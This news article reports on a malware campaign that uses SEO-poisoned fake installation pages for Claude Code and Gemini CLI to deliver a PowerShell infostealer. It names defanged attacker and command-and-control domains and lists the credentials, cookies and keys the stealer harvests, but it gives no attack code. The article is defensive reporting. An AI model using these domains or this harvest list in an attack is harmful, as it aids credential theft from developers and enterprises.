Security researchers have uncovered a coordinated malware campaign targeting developers through fake websites impersonating Anthropic's Claude Code and Google's Gemini CLI. The threat actors use search engine manipulation to make malicious sites appear above legitimate results, then trick users into downloading infostealers that harvest credentials and sensitive data from enterprise applications.

How Are These Fake Sites Spreading?

The campaign began in early March 2026, with threat actors registering domains designed to mimic official installation pages. Security researchers at EclecticIQ discovered that attackers used SEO poisoning techniques to surface fake domains above legitimate results in search engines. Victims searching for "Gemini CLI" or "Claude Code" installation instructions are directed to attacker-controlled infrastructure instead of official documentation.

The malicious domains include geminicli[.]co[.]com and claudecode[.]co[.]com, which display cloned installation pages that visually match Anthropic's and Google's official documentation. Users are prompted to copy and paste a PowerShell command into their terminal, which downloads the infostealer malware.

What Data Are These Infostealers Targeting?

The malware is specifically designed to target enterprise users and developer workstations, harvesting credentials and sensitive information from a wide range of applications. The infostealer operates entirely in memory through PowerShell, making it harder to detect while it exfiltrates stolen data in encrypted form to command-and-control servers.

The malware targets multiple categories of sensitive information:

• Web Browsers: Login credentials, session cookies, autofill data, and form history from Chrome, Edge, Brave, and Firefox.
• Collaboration Platforms: Slack local state keys and network cookies, Microsoft Teams cache cookies with decryption of protected local state, Discord LevelDB files, Mattermost session cookies, Zoom encryption keys, and Telegram Desktop session directories.
• Cloud and Financial Services: Cryptocurrency wallet preferences including Brave Wallet and Spectre, cloud storage credentials from Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive.
• Remote Access Tools: OpenVPN configuration files and credentials for remote desktop applications.

A single compromised session cookie or local state key from platforms like Slack or Teams grants attackers authenticated access to the victim's entire workspace, including internal channels, shared files, client communications, and connected integrations.

Who Is Behind These Attacks?

EclecticIQ researchers assessed that the campaign is likely geographically tailored to target users in the United States and the United Kingdom, based on the selection of.co.uk,.us.com, and.us.org top-level domains. The similarities between the Gemini CLI and Claude Code attack chains strongly suggest a single threat actor is orchestrating both campaigns.

"The stealer's collection scope reveals a deliberate focus on enterprise users and developer workstations," noted the EclecticIQ researchers in their May 21 report.

EclecticIQ Security Researchers

After execution, the infostealer establishes connections to command-and-control servers hosted at events[.]msft23[.]com for the Gemini campaign and events[.]ms709[.]com for the Claude Code campaign. The malware also allows attackers to perform arbitrary remote code execution tasks on compromised devices, which financially motivated cybercriminals typically leverage to transition into hands-on-keyboard intrusions against selected victims.

What Should Developers Do to Stay Safe?

Developers should verify they are visiting official installation pages before downloading any AI coding tools. Always check the URL carefully and bookmark official documentation rather than relying on search results. When installing command-line tools, be cautious about copying and pasting PowerShell commands from unfamiliar sources, even if the website appears legitimate.

Why Does This Matter for the AI Coding Tool Market?

The campaign highlights growing security risks as AI coding assistants become more prevalent in enterprise environments. As tools like Claude Code gain adoption among developers, threat actors are increasingly targeting them through social engineering and SEO manipulation. The focus on harvesting enterprise credentials suggests attackers view compromised developer workstations as high-value targets for accessing corporate infrastructure and sensitive projects.

This security incident comes as the AI coding tool market intensifies. Chinese AI startup DeepSeek is assembling a new team to develop Code Harness, a tool designed to directly compete with Claude Code and OpenAI's Codex. The competitive pressure in this space underscores the importance of secure distribution and installation practices as these tools become more central to development workflows.